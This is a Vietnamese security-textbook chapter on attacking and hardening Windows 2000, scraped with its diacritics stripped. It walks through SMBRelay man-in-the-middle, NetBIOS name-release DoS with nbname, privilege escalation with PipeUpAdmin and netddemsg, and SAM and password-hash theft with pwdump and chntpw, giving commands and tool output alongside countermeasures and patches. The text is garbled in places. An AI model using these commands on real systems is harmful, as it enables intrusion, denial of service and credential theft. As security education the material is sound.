Lanman type: ???: Windows NT 4.0 Response: session Message 144 bytes OS: Windows NT 4.0 Lanman type: NT LAN Manager 4.0 Domain: NT4DOM Password hash written to disk Connected? Relay IP address added to interface 2 Bound to port 139 on address 192.168.234.252 Relaying for host GW2KNT4 192.168.234.220 Ti y, k tn cng t nhp thnh cng vo dng SMB gia my khch b tn cng v my ch ch, v khai thc thng tin LM v NTLM ca my khch t thng bo phn hi hiu lnh. Kt ni vi a ch chuyn tip s cho php tip cn vi ti nguyn ca my ch ch. V d, y l h thng tn cng c lp ci t phn C$ trn a ch chuyn tip. D:\>net use * \\192.168.234.252\c$ Drive G: is now connected to \\gw2knt4\c$ The command completed successfully. y l nhng g c th thy v s kt ni t h thng ca gii tin tc trn bn giao tip ngi-my ch SMBRelay: +++ Relay connection for target GW2KNT4 received from 192.168.234.50:1044 +++Sent positive session response for relay target GW2KNT4 +++Sent dialect selection response (7) for target GW2KNT4 +++Sent SMB session setup response for relay to GW2KNT4 SMBRelay c th khng n nh v kt qu khng phi lc no cng ng hon ton, nhng thc hin thnh cng, r rng l mt t tn cng ph hoi. My trung tm tip cn hon ton vi ti nguyn ca my ch ich m khng cn nhc mt ngn tay. ng nhin, kh khn ch yu y l: trc ht phi thuyt phc my khch b tn cng xc nhn vi my ch MITM, tuy nhin, chng ti bn bc mt s phng php gii quyt kh khn ny. C th gi cho my khch b tn cng mt tin nhn e-mail xu vi mt siu lin kt c gn sn vi a ch ca my ch MITM SMBRelay. Hoc thc hin mt tn cng c hi ARP trng li ton b mt mng no . Lm cho ton b h thng trn phn phi xc nhn thng qua my ch MITM bt hp php. Tho lun s chuyn giao/cache c hi trong chng 10.

http://itlab.com.vn

 Cc bin php i ph my trung tm SMB (MITM) Cc bin php c v r rng vi SMBRelay l cu hnh Windows 2000 s dng SMB Signing, hin c xem nh s ha khch /truyn thng phc v. My SMBSigning c gii thiu vi dch v Windows NT4 l 3 v c tho lun trong mc KB Q161372. Nh ci tn gi gi , xc lp Windows 2000 nhm s ha khch hoc truyn thng phc v s lm k hiu mt m ha mi khi ca truyn thng SMB. Ch k ny c th c mt my khch hoc my ch kim tra m bo tnh ton vn v xc thc ca mi khi, lm cho my ch SMB khng thch hp v mt l thuyt (khng chc c thc, ph thuc vo thut ton du hiu c s dng). Theo mc nh Windows 2000 c cu hnh nh: S ha truyn thng khch (khi c th) c kch hot Knh an ton: mt m s d liu knh an ninh (khi c th) c kch hot c kch Knh an ton: S ha d liu knh bo mt (khi c th) hot Nhng xc lp c trong cc chnh sch bo mt /cc b/ nhng la chn an ton. V vy, nu my ch h tr vic k SMB, Windows 2000 s s dng n. k SMB, ta c th tu kch hot cc tham s ph trong phn Security Options. K truyn thng my khch dng s (lun lun) c kch hot K truyn thng my ch dng s (lun lun) (n s ngn chn hin tng chuyn li t SMBRelay). c kch hot Knh an ton: k hoc m ho s d liu knh an ton (lun lun) c kch hot Knh an ton: yu cu phm chuyn mnh (Windows 2000 hoc mi hn) c kch hot Ch nhng xc lp ny c th gy ra nhng trc trc v lin kt vi cc h thng NT4, thm ch SMB signing c th lm vic trong cc h thng . Tuy nhin, nh chng ta thy, SMBRelay hiu chnh nhm v hiu ha SMB Signing v s c th ph v nhng xc lp ny. Do cc t tn cng SMBRelay MITM l nhng kt ni hp l ch yu, khng c cc mc pht l chuyn dng thng bo tn cng ang xy ra. i vi my khch bi tn cng, nhng vn v kh nng lin kt c th ra tng khi kt ni vi my ch SMBRelay gian ln, bao gm li h thng s 59, mt s c mng ngoi d tnh. Nh SMBRelay, vic kt ni s thc s thnh cng , nhng n t tch ri vi s kt ni ca khch v tin tc.

http://itlab.com.vn

Tn cng IIS 5
Nu bt k mt v tn cng no ngang hoc vt qu kh nng ca NetBIOS v SMB/CIFS trong b m hin thi, phng php thm nhp my ch thng tin Internet (IIS)s tng ln v s, mt s tr gip ng tin cy c tm ra trong cc h thng NT/2000 kt ni Internet. Cc sn phm my ch Windows 2000 c ci t IIS 5.0 v dch v Web kch hot mc nh. Mc d chng ta s tm hiu chi tit cc th thut tn cng Web trong chng 15, chng ti cho rng bn cn phi bit ng tip cn quan trng bn khng qun ca vo h iu hnh rt c th ang trng thi m. Ch : kim tra ton b cun t nhp Windows 2000 bit cc hnh thc tn cng v nhng bin php i ph ch ng.

Trn b m t xa
Trong chng 5 chng ti tho lun hin tng trn b m trung gian Win 32 v trch dn mt s ngun cc bn c thm v vn ny. Hin tng trn b m nguy him nht trong Windows 2000 l IIS c lin quan: trn b m Internet Printing Protocol ISAPIDLL (MS01-123), thnh qu Index server ISAPIDLL (MS01-123), v tn cng thnh phn ph Front Page Server Extensions (MS01-035), nhng hin tng ny c trnh by trong chng 15. KHC T DCH V Do hu ht cc v tn cng (DoS) NT c sa tm bi NT4 Service Pack 6a, Windows 2000 tng i mnh im ny. Khng c g l khng th b tn cng vi DoS, mc d vy, chng ti s tho lun trong phn tip theo. Phn trnh by v tn cng Windows 2000 DoS ca chng ti c chia lm hai phn: tn cng TCP/IP v tn cng NetBIOS. Tn cng Windows 2000 TCP/IP DoS y l mt thc t trn mt trn Internet - s dng qu ti. Win2000test.com nhn thy rng Internet b s dng qu kh nng ti u ca n, mc d nhng qui nh v th nghim trnh hon ton cc v tn cng DoS. My ch trong vn ny gp phi cc t tn cng mnh m b phn IP vt qu kh nng ca my ch tp hp li cc gi tin, cng nh cc t tn cng ol SYN xm nhp vo hng ca ngn xp TCP/IP ca cc lin kt na m. (xem chng 12 bit thm chi tit) Cc bin php i ph TCP/IP DoS Cu hnh cc cng c cng vo mng hoc phn mm bo v nhm i hng hu ht s c nu tt c cc s c u khng phi do k thut gy ra. (xem chng 12 bit thm chi tit.) Tuy nhin, nh chng ta vn ni, cu hnh cc my ch c nhn chng li cc t tn cng trc tip l mt tng tt trong trng hp mt tng bo v b hng.

http://itlab.com.vn

Phn ln do kinh nghim c c t Win2000test.com, Microsoft c th thm mt s kha Registry vo Windows 2000 phm ny c th c s dng lm vng chc thm ngn xp TCP/IP chng li tn cng DoS. Bng 6-3 trnh by ngn gn cch thc n v Win2000test.com cu hnh DoS-related Registry xp sp trong my ch. (bng ny c phng theo trang trng ca Microsoft t kinh nghim t Win2000test.com, bn c th truy cp trang: http:// www.microsoft.com/security, cng nh xem cc thng bo c nhn vi n v Win2000test.com) Kha trong HKLM\ Sys\ CCS\ Service Tcpip\parameter\SynAtta ck Protect Ch s yu cu 2
Miu t

Tcpip\parameter\Enable DeadGWDetect

Thng s ny lm cho TCP hiu chnh s tip pht ca SYN-ACKS t vic kt ni phn ng li thi gian cht nhanh hn nu mt tn cng SYN trong tin trnh xy ra. S xc nh ny da trn TcpMaxPortsExhausted hin thi, TcpMaxHalfOpen, v TcpMaxHalfOpenR etried. Mt trong hai ch s cung cp s bo v tt nht chng li cc tn cng SYN, nhng c th gy ra trc trc v lin kt cho ngi s dng i vi nhng ng dn c gc tr cao. Ngoi ra, cm la chn di y s khng lm vic nu thng s c ci t cho 2 ch s. Windows c th thay i t l (RFC 1323) v cc thng s TCP cu hnh mi b iu hp (RTT ban u, kch c Windows). Khi thng s ny l 1, TCP c php thc hin vic r tm cng vo v hiu, lm cho n chuyn sang cng vo sao lu nu mt s kt ni gp phi kh khn. Cc cng vo sao lu c th c nh dng trong phn Advanced ca hp i thoi cu hnh TCP\IP trong Network Control Panel. Ci t vo ch s 0 v th tin tc khng th chuyn i

http://itlab.com.vn

sang cc cng vo c ha km. Tcpip\parameter\Enable 0 Khi thng s ci t l 1 (ng),TCP PMTUDiscovery hiu chnh r tm ra n v truyn dn ti a (MTU, hoc kch c gi tin ln nht) qua ng dn ti mt my ch t xa. Bng vic pht hin ra Path MTU v gii hn cc b phn TCP kch c , TCP c th loi tr vic phn on cc cu dn dc theo ng dn kt ni mng vi cc MTU khc nhau. Vic phn on c nh hng rt ln n thng lng TCP v s nghn mch. Ci t thng s 0 khin cho mt MTU 576bytes c s dng cho tt c cc lin kt ngoi tr my ch mng cc b v ngn chn gii tin tc p MTU vi mt ch s nh hn trong n lc bt ngn xp lm vic qu sc. Tcpip\parameter\ 300,0 Thng s ny kim sot vic TCP hiu KeepAliveTime 0 chnh xc minh rng mt lin kt (5 hng vn cha c pht hin do vic pht) gi mt gi tin ang tn ti. Nu h thng t xa vn pht huy hiu lc, n tha nhn vic truyn dn vn ang hot ng. Cc gi tin ang tn ti s khng c mt nh gi i. c im ny c th c thc hin nh mt ng dng v lin kt. l s xp sp chung, ng dng cho tt c cc mch ghp ni, v c th qu ngn cho cc b iu hp s dng qun l hoc cng nhn tnh trng d tha. Tcpip\parameter\Interface 0(hn Thng s ny xc nh liu my tnh c s g) pht ra tn NetBIOS ca n hay khng <interfaces> khi n nhn c mt lnh NameNoNameReleaseOnDema Release t mng. Mt ch s 0 bo v nd khi cc tn cng Name-Release nguy him.(xem Microsoft Security Bullentin MS00-047). Cha r l mt tn cng c th c nh hng g, nu c th nh hng i vi mch ghp ni ni

http://itlab.com.vn

NetBIOS/SMB/CIFS b v hiu ha, nh tho lun trong phn u ca chng. Tcpip\parameter\Interface 0 Thng s ny kim sot kh nng s<interfaces> Windows NT/2000 c hiu chnh PerformRouterDiscovery pht hin router bng RFC 1256 trn c s qua mch ghp ni hay khng. Mt ch s 0 ngn chn cc v tn cng nguy him router khng tht. S dng ch s ny trong Tcpip\parameters\Adapters tnh ton xem ch s no ca mch ghp ni l ph hp vi b iu hp mng. Bng 6-3. Gii thiu thit lp NT/2000TCP/IP Stack nhm hn ch cc v tn cng Khc t dch v (Denial of service) CNH BO:Mt vi ch s trong bng 6-3, nh SynAttackProtect=2, c th qu linh hot trong mt vi mi trng. Nhng xc lp c trnh by nhm bo v mt my ch Internet c kh nng ti cao. Xem mc KB Q142641 bit thm chi tit v vic xp sp SynAttackProtect v cc thng s ny. Tn cng NetBIOS DoS Thng 6 nm 2000, Sir Dystic of Cult of the Dead Cow (http:// www.cultdeadcow.com) thng bo rng: gi mt tin nhn NetBIOS Name Release ti NetBIOS Name Service (NBNS, UDP 137) trn mt my NT/2000 buc n phi ly tn i lp v vy h thng s khng cn kh nng s dng n na. iu ny gy cn tr ln cho my trong vic tham gia mng NetBIOS. Cng lc , Network Associates COVERT Labs (http:// www.nai.com) pht hin ra rng mt tin tc c th gi cho Net BIOS Name Service mt tin nhn NetBIOS Name Conflict ngay c khi my tip nhn khng nm trong qu trnh ng k NetBIOS Name. iu dn n vic ly tn i lp, v khng th s dng c na, cn tr ln vic tham gia vo mng NetBIOS ca h thng. Sir Dystic m ha mt u th c gi l nbname kh nng ny c th gi mt gi tinNBNS Name Release ti tt c cc mc nhp trong bng NetBIOS name. y l mt v d v cch s dng nbname cho my ch n DoS. Trong Windows 2000, trc ht bn phi v hiu ha NetBIOS i vi TCP/IP ngn chn s xung t vi dch v NBNS, dch v thng thng c th c nht s dng UDP 137. Sau , cho chy nbname nh trnh by sau y. (t 192.168.234. 222 vi a ch IP ca my ch bn mun vo DoS) C:\>nbname/astat 192.168.234. 222 /conflict

http://itlab.com.vn

NBName v2.51 Decodes and displays NetBIOS Name traffic (UDP 137), with options Copyright 2000: Sir Dystic, Cult of the Dead Cow -:/:- New Hack City Send complaits, ideas and donations to sd@cultdeadcow.com/sd@newhackcity.net WinSock v2,0 (v2.2) WinSock 2.0 WinSock status: Running Bound to port 137 on address 192.168.234.244 Broadcast address: 192.168.234.255 Netmask: 255. 255.255.0 **** NBSTAT QUERY packet sent to 192.168.234. 222 waiting for packets ** Received 301 bytes from 192.168.234. 222.137 via local net at web jun 20 15:46:12 200 OPCode: QUERY Flags: Response Authoratative Answer Answer[0] <00> Node Status Resoure Rocord: MANDALAY <00> ACTIVE UNIQUE NOTPERM INCONFLICT NOTDEREGED B-NODE MANDALAY <00> ACTIVE GROUP NOTPERM NOCONFLICT NOTDEREGED B-NODE **** Name release sent to 192.168.234. 222. (etc.) Kha chuyn i /ASTAT truy lc trng thi b iu hp t xa t nn nhn, v /CONFLICT gi cc gi tin tch tn cho tng tn trong bng tn t xa ca my, cc my phn ng li yu cu v trng thi b iu hp. Mt tin tc c th tn cng DoS trn ton b mt mng li c s dng kha chuyn i QUERY (tn IP) /CONFLICT/NENY (tn_or_tp). My ch khi b tn cng c th c nhng triu chng sau: Xut hin s c kh nng lin kt mng theo giai on Nhng cng c nh Network Neighborhood hot ng Cc tng ng lnh net send khng pht huy tc dng My ch bi tn cng khng xc nhn gi tr cc ng nhp min Khng th tip cn cc ti nguyn dng chung v mt s dch v NetBIOS c bn nh gii php tn NetBIOS. Lnh nbtstat-n c th hin th trng thi Conflict(Xung t) bn cnh dch v tn NetBIOS, c th nh sau:

http://itlab.com.vn

Local Area Connection Node IpAddress: (192.168.234. 222) Scope Id: [] NetBIOS Local Name Table Name Type Status -------------------------------------------------------------------------------MANDALAY <00> UNIQUE Conflict MANDALAYS <00> GROUP Registered MANDALAYS <1C> GROUP Registered MANDALAY <20> UNIQUE Conflict MANDALAYS <1E> GROUP Registered MANDALAYS <1D> UNIQUE Conflict .. _ MSBROWS_ <01> GROUP Registered MANDALAYS <1B> UNIQUE Conflict Inet~Servics <1C> GROUP Registered IS~MANDALAY.. <00> UNIQUE Conflict Cc bin php i ph NBNS DoS Hy li cho IBM (NetBIOS c pht minh). NetBIOS l mt nh c cha c xc minh c ng dng. B phn nh v ca Microsoft to ra phm Registry, phm ny dng vic tha nhn tin nhn Name Release ca NetBIOS Name Service. B phn nh v ca Name Conflict ch c dng tha nhn tin nhn NBNS Name Conflict khi ang trong giai on ng k. Trong thi gian ny my vn c th b tn cng. Cc b phn nh v v cc thng tin khc c th c cp nht trn trang web: http:// www.microsoft.com/technet/security/bulletin/MS00-047. asp. Gii php i ph tm thi ny khng nm trong SP1, v vy n c th c p dng cho c h thng trc v sau SP1. L ng nhin, gii php lu di l phi chuyn i t NetBIOS trong cc mi trng m tnh trng ph ri c th xy ra. Tt nhin, phi lun m bo rng UDP 137 khng th b tip cn t bn ngoi khu vc bo v. LEO THANG C QUYN Mt khi gii tin tc tip cn mt my ch trong h thng Windows 2000, ngay lp tc chng s tm cch c c c quyn hp php: Administrator account. May mn l Windows 2000 c kh nng chng c li tt hn cc phin bn trc khi b tn cng. (rt t khi n ri vo tnh trng r b tn cng nh trc nh: s dng bin php i ph tm thi cho admin v sechole). Ri ro l ch, mt khi gii tin tc ginh c c quyn ng nhp tng tc, kh nng ngn chn leo thang c quyn l rt hn ch. (ng nhp tng tc s c m rng nhiu hn khi Windows 2000 Terminal Server tr ln ph bin trong vic qun l t xa v chi phi kh nng x l.) Sau y chng ta s xem xt hai v d

http://itlab.com.vn

D bo ng dn tn m ha l SYSTEM Tnh 4 Tnh 7 Tnh 10 Mc 7 ph gin hiu ri bin: n: qu: ro:

c khm ph bi Mike Schiffman v gi cho Bugtraq (ID 1535), kh nng d on v vic ch to k hiu ng dn c tn khi Windows 2000 bt u h thng dch v (nh Server, Worksation, Alerter v ClipBook u c nhp vo di trng mc SYSTEM) c khm ph t im yu trong leo thang c quyn cc b khi. Trc khi mi dch v c bt u, mt k hiu ng dn c tn cnh my ch c to ra vi mt chui tn c th d on c. Chui ny c th thu c t kho Registry HKLM\System\CurrentControlSet\Control\ServiceCurrent. V vy, bt k ai s dng Windows 2000 c nhp tng tc (bao gm c nhng ngi s dng Terminal Server t xa ) c th d on tn ca mt chui k hiu ng dn c tn. Minh ha v p dng ni dung an ninh ca SYSTEM s c trnh by vo ln sau. Nu mt m ty chn no c ci t vo k hiu ng dn, n s vn hnh vi cc c quyn SYSTEM, lm cho n ch c kh nng thc hin i vi h thng cc b (vd: b sung thm ngi s dng hin thi vo nhm Administrator). Khai thc im yu trong d on k hiu ng dn c tn l tr chi ca tr em khi s dng cng c PipeUpAdmin t Maceo. PipeUpAdmin b sung trng mc ngi s dng hin thi vo nhm Administrator cc b, nh c trnh by v d di y. V d ny tha nhn Wongd ngi s dng l c xc minh vi vic tip cn tng tc vi bn giao tip ngi-my bng lnh. Wongd l mt thnh vin ca nhm iu khin Server Operators. Trc ht, Wongd kim tra hi vin ca nhm Administrators cc b nm mi quyn lc. C:\>net localgroup administrators Alias name administrators Comment administrators have complete and unrestricted access to the Computer/domain Members

http://itlab.com.vn

------------------------------------------------------------------------------------------------Administrator The command completed successfully. Sau , Wongd t nhp vo Administrators, nhng li nhn c thng bo t chi tip cn do thiu c quyn. C:\>net localgroup administrators wongd/add System error 5 has occurred Access is dinied Tuy nhin, anh hng wongd cha b tn cng. Anh ta tch cc ti PipeUpAdmin v t trang web (http:// www.dogmile.com/files), v ng dng C:\>pipeupadmin PipeUpAdmin Maceo<maceo @dogmile.com> Copyright 2000-2001 dogmile.com The ClipBook service is not started More help is available by typing NET HELPMSG 3521. Impersonating: SYSTEM The account: FS-EVIL\wongd has been added to the Administrators groups Sau , Wongd chy lnh Net Localgroup v t xc nh ng v tr m anh ta mun. C:\>net localgroup administrators Alias name Administrators Comment Administrators have completed and unrestricted access to the Computer/domain Members ------------------------------------------------------------------------------------------Administrator Wongd The command completed successfully. Hin ti, tt c nhng g wongd phi thc hin tn dng c quyn ca Administrator tng ng l thot v ng nhp li. Nhiu trng hp khai thc s leo thang cquyn phi c yu cu , v Windows 2000 phi xy dng li m thng bo tip cn ca ngi s dng hin thi nhm b sung thm SID cho thnh vin nhm mi. M thng bo c th c s dng lnh gi API mi, hoc n gin bng cch tt my ri sau xc nhn li. (xem phn tho lun v m thng bo ti chng 2).

http://itlab.com.vn

Ch cng c PipeUpAdmin phi c chy trong phm vi ngi s dng INTERACTIVE. (co ngha l bn phi nhp vo h ti bn phm vt l, hoc thng qua mt trnh tin ch iu khin t xa vi trng thi INTERACTIVE, v d nh thng qua Terminal Services). iu ny ngn chn PipeUpAdmin c chy qua cc trnh tin ch iu khin t xa cc trnh tin ch ny xut hin m khng c INTERACTIVE SID trong m thng bo.

Sa cha kh nng d on k hiu ng dn c tn

Microsoft a ra mt gii php ng ph tm thi nhm thay i vic Windows 2000 Service Control Manager (SCM) to ra v phn b k hiu ng dn nh th no. Bn c th tm hiu thm chi tit ti a ch: http:// www.microsoft.com/technet/security/bulletin/MS00-053. asp. Gii php ng ph tm thi ny khng nm trong Service Pack 1 v v th c th c p dng cho c my ch trc v sau SP1. Tt nhin, nhng c quyn ng nhp tng tc b gii hn ti mc ti a cho bt k mt h thng no c cha d liu d b tn cng do vic tn dng nh vy tr nn d dng hn nhiu mt khi gii tin tc t c v tr nguy him . kim tra vic ng nhp tng tc ngay di Windows 2000, chy applet Security Policy (cc b hoc nhm), tm nt ch nh chnh sch cc b\ quyn s dng, v kim tra quyn Log On Locally c nh hnh nh th no. Windows 2000 c ci mi lnhiu c quyn hin c bn sao cho php cc nhm c th hoc ngi s dng khng c quyn . Trong v d ny, bn c th s dng quyn Deny Logon Locally, nh sau:

Ch :Theo mc nh, nhm Users v trng mc Guest c quyn Log On

Locally trong Windows 2000 Professional v cc my ch Windows 2000 khng kt ni. DC hn ch hn do chnh sch Default Domain Controllers (Mch iu khin min mc nh) gn lin vi sn phm. (mc d tt c nhm Operator my u c quyn .) Chng ti ngh tho g Users v Guest trong bt c trng hp no v cn nhc k lng nhng nhm no khc c th mt i c quyn .

http://itlab.com.vn

 Vi phm truy nhp xuyn trm cng tc Tnh ph bin: Tnh gin n: Tnh hiu qu: Mc ri ro: 4 7 10 7

Hu ht cc qun tr Windows khng chp nhn cc trm cng tc trong Windows, c l y l mt trong nhng vn kh hiu nht trong chng trnh Windows. M hnh an ninh Windows 2000 xc nh s phn cp cc conten xc lp cc ng bin an ninh trong cc qu trnh. S phn cp , t ln nht n nh nht nh sau: Phin, Trm cng tc, v mn hnh. Phin bao gm mt hoc nhiu trm cng tc, nhng trm cng tc ny bao gm mt hoc nhiu mn hnh. Theo thit k, qa trnh x l b hn ch chy trong mt trm cng tc, v cc chui trong qu trnh x l chy trong mt hay nhiu mn hnh. Tuy nhin, do mt li trong khi thc hin, khng phi l trng hp ca phin bn u tin ca Windows 2000. Trong cc trng hp c bit, mt qu trnh c quyn thp hn chy trong mt mn hnh c th c c thng tin ca mt mn hnh trm lm vic khc c cng Phin. Kt qu l ngi s dng b nh hng ng nhp vo Windows 2000 c th tng tc vi cc qu trnh c Phin ging nhau. (ch : thao tc ny khng cho php nhiu ngi tng tc vi ng nhp Terminal Server ca ngi s dng khc v h c Phin tch ri nhau.) H cng c th to ra mt qu trnh trong trm lm vic khc. Tuy nhin, n khng r l h c th thc hin thao tc no thm ch qu trnh c to ra c c quyn SYSTEM. Mc d vy, rt t trng hp gii tin tc c th c c mn hnh v d liu vo bn phm.

Bin php i ph vi s c Workstation

Do y l mt s c ai cng phi tha nhn trong vic thc hin thit k ca Microsoft, chng ti phi da vo phng thc sa tm thi khc phc. Mt phng php sa tm thi c lu tr trong m hnh an ninh mn hnh v vy n chia tch thch hp cc qu trnh trong cc mn hnh khc nhau ti a ch: http:// www.microsoft.com/technet/security/bulletin/ms00-020. asp. Phng php ny c trong SP1. Mt cch gii quyt khc l gii hn c quyn ng nhp tng tc ( Xem thm chi tit trong phn d on ng dy dn c tn )

Yu cu NetDDE chy vi t cch l SYSTEM

Tnh 6 Tnh 7 Tnh 10 Mc 8 ph gin hiu ri bin: n: qu: ro:

http://itlab.com.vn

Thng 2 nm 2001, DilDog ca @stake pht hin ra mt b phn d b tn cng trong dch v trao i d liu ng(NetDDE) trong mng Windows 2000, dch v ny cho php mt my khch cc b c th tu thc chy bt k mt lnh no vi c quyn SYSTEM. NetDDE l mt cng ngh gip cho cc ng dng dng chung d liu thng qua phn dng chung tin cy. Mt yu cu c th c a ra thng qua phn dng chung tin cy thc hin cc ng dng m c th chy trong phm vi chng mc SYSTEM. @stake a ra mt m ngun kim tra khi nim cho mt cng c c gi l netddemsg m t ng ho k thut leo thang c quyn. Li Khuyn: Mt m ngun netdde.cpp do @stake a ra i hi nddeapi.lib phi c kt ni trong qu trnh bin dch. Trong Visual C++, thc hin yu cu di cc mdun th vin/Object/Link tab/Settings/Project, b sung thm mt du cch, v sau nh nddeapi.lib. chy sn phm ny, u tin khi ng dch v NetDDE nu cha c khi ng. Hu ht cc trng mc ngi s dng khng c c quyn khi chy mt dch v nh thnh vin trng mc Operator c ci t sn. Bn c th khi chy dch v NetDDE t dng lnh, hoc bn cng c th s dng dch v MMC ci t nhanh bng cch chn lnh Run v bt u tp services.msc. Nu sau bn chy cng c netddemsg m khng c cc s lnh, n s nhc bn c php chun. By gi ta c th chy netddemsg v xc nh phn dng chung ng tin cy bng la chn i s -s, cng nh lnh c thc hin. Sau , tp tin cmd. exe c nh r v mt trnh tin ch bng lnh s c m. C:\>netddemsg s Chat $ cmd. exe Ngay sau khi thc hin lnh, mt bn giao tip ngi-my bng lnh s c bt ln chy trong phm vi ca mc h thng. Bn c th chy cng c Resource Kit Whoami trong trnh tin ch thy rng n thc s chy trong phm vi ca mc h thng. Ch rng i lp vi sn phmvic tn dng PipeUpAdmin tho lun trong phn trc, netddemsg khng i hi gii tin tc phi tt my lm mi m thng bo ca chng. Trnh tin ch khi chy vic s dng netddesmg chy trong phm vi ca mc SYSTEM, ngay t trnh tin ch ng nhp hin thi. Tuy nhin, ging nh PipeUpAdmin, netddemsg phi c chy trong phm vi ngi s dng INTERACTIVE. (c ngha l bn phi nhp vo h ti bn phm vt l, hoc thng qua mt trnh tin ch iu khin t xa vi trng thi INTERACTIVE, v d nh thng qua Terminal Services.)

http://itlab.com.vn

 Bin php i ph hin tng leo thang NetDDE.

Cng nh kh nng d on k hiu ng dn c tn, vi mt thiu st trong thc thi mc h thng nh vy, bin php i ph duy nht l c Microsoft sa tm ( a ch: http: //www.microsoft.com/technet/treeview/default. asp? url=/technet/security/bulletin/MS01-007. asp, c lu tr thng tin v gii php ng ph tm thi.). Chng ti s trnh by mt s bin php i ph vi hin tng leo thang c quyn ni chung trong phn tip theo. Cng cn ch thm l khi ng dch v NetDDE c th b cn tr nu kim ton c th hat ng c, mt cch tt l kim tra xem c ai c gng s dng netddemsg cn tr bn hay khng. NH CP THNG TIN Mt khi c c Administrator-trng thi tng ng, gii tin tc s tm cch nhm chim ot nhiu thng tin hn nhng thng tin ny c th l n by cho cc v tn cng khc. Khai thc thng tin mt khu Windows 2000 Gii tin tc s rt vui mng khi bit c l LanManager (LM)hash c lu tr bng cch mc nh trong Windows 2000 cung cp s tng thch ngc vi cc my khch khng Windows NT/2000. phng php mc nh ny l nguyn nhn ch yu ca cc im tn cng c tho lun trong chng 5 cng vi phng php gii quyt. Tuy nhin, vi mt phng php i ph gin n, k thut tp hp password hash tiu chun l rt hn ch bi mt s c tnh mi ca Windows 2000, ch yu l SYSKEY. Nhng rt hn ch nh chng ta c th thy.

Chim ot SAM
Tnh ph bin: 8 Tnh gin n: 10 Tnh hiu qu: 10 Mc ri ro: 9 Trong b iu khin vng ca Windows 2000, password hashes c lu tr trong Active Directory(%windir%\NTDSntds.dit). Vi thit b mc nh cc i tng c ci t, tp ny chim 10 megabytes, nm trong mt dng thc b n, v th gii tin tc khng mun g b tp ny phn tch ngoi tuyn. Trong b iu khin phi lnh vc (DCs), tp qun l mc an ton (SAM) vn l mc tiu la chn, v vic chim ot SAM c thc hin chnh xc nh

http://itlab.com.vn

c thc hin di NT 4. Tp SAM vn c lu tr trong % gc h thng %\ h thng 32\ cu hnh v vn b OS kha. Khi ng vi DOS v chim ot SAM vn c th c thc hin trong h thng tp tin NTFS v.5 mi bng cch s dng tin ch NTFSDOS d b tn thng trn a ch: http:// www.sysinternals.com/. Mt bn sao tp tin SAM vn xut hin trong \%gc h thng%\ sa cha (tn SAM c thay bng SAM_ nh trong NT 4), v tp tin bao gm tt c ngi s dng cu hnh trong mt h thng khi ci t. Tin ch rdisk c tch hp vo Microsoft Backup v.5 ng dng (ntbackup. exe), tp tin c mt chc nng to a sa khn cp. Khi lnh Create Emergency Repair Disk c chn, hp thoi hi: thng tin c sao chp sang th mc sa hay khng nh di y:

Nu ng s la chn , Registry, bao gm tp hp SAM, c sao chp sang %windir% \sa\ danh mc RegBack. Cc thnh vin ca nhm Users c truy cp Read vi danh mc , v cc thnh vin ca Power Users c truy cp Modify nu a h thng c nh dng NTFS mc d ch Power Users c truy cp b sung vi tp tin , ch Users th khng. Cc v tn cng bn sao SAM phn no c gim nh do tp tin l SYSKEYed, v cc k thut gii m mt tp tin SYSKEYed (tri vi pwdump2ing mt SAM nng khng c pht ra t nhin.) Ch :Tp tin SAM Windows 2000 cl SYSKEY mc nh (xem phn sau) v phi c trch lc ra cng vi pwdump2 hoc 3.

Gi Clean Repair\Th Mc RegBack

Lu khng ly bt k mt c hi no di chuyn nhng file ny ti mt a c th xo c hay ti mt im bo mt thay th, v khng nhng file ny vo th mc RegBack. Tuy nhin, tt hn ht bn khng nn chn Backup Registry Locally khi ang chy tin ch Create Emergency Repair Disk (To a khi ng khn cp).

Kt Xut File Ri Vi PwdumpX

Tnh 8 Tnh 10 Tnh 10 Mc 9 ph n hiu ri bin gin qu ro

http://itlab.com.vn

SYSKEY gi y l cu hnh mc nh cho Windows 2000 (xem mc KB Q14375 v chng 5 bit hiu thm v SYSKEY). V vy, cng c pwdump khng th trch xut chnh xc ht nhng mt khu t mc Registry trong nhng sn phm my ch c ci Windows 2000. thc hin cng vic ny cn c pwdump2 (xem chng 5 hiu thm v pwdump v pwdump2, v ti sao pwdump li khng th thc hin chng SYSKEY). Hn na, vic trch xut thng tin cc b t trnh iu khin min cn c phin bn mi nht ca pwdump2 (ti http://razor.bindview.com) v nhng thng tin ny ph thuc vo Active Directory (th mc ng) lu tr nhng mt khu hn l ph thuc vo SAM nh trc y. Cng ngh kinh doanh in t, inc., va cho ra mt phin bn cng c pwdump2 gc ca Todd Sabin c tn pwdump3e (http://www.ebiztech.com/html/pwdump.html). Pwdump3e ci t samdump DLL nh mt dch v trch xut thng tin t xa qua SMB (TCP 139 hay 445). Pwdump3e s khng hot ng trn h thng cc b.

Bin Php i Ph pwdumpX

S khng c cn tr i vi pwdump2 hoc pwdump3e nu ci t DLL khng hot ng trong Windows. Tuy nhin pwdumpX cn phi c c quyn ca Administrator th hot ng v n phi c chy trong mng cc b. Nu k tn cng dnh c li th ny, chng c th t c mc ch trn h thng cc b. (Tuy nhin s dng s liu t SAM tn cng h thng giao ph li l mt vn khc).

Nhp Thng tin vo SAM bng chntpw

Tnh ph bin 8 Tnh n gin 10 Tnh hiu qu 10 Mc ri ro 9 Nu k tn cng dnh c truy cp vt l vo mt h thng, cng vi thi im t c ch tng xng khi chy n sang mt h iu hnh khc, chng c th thc hin c mt cuc tn cng tinh vi c Petter NordahlHagen m t ti trang http://home.eunet.no/~pnordahl/ntpasswd/. Trong hng lot trang lin kt ca trang ny, Petter a ra mt s nhng dn chng gy ch , bao gm:

http://itlab.com.vn

Nhng thng tin phn tch c th c a vo SAM ngoi tuyn, cho php bt c ai c th thay i mt khu ca ngi s dng h thng .

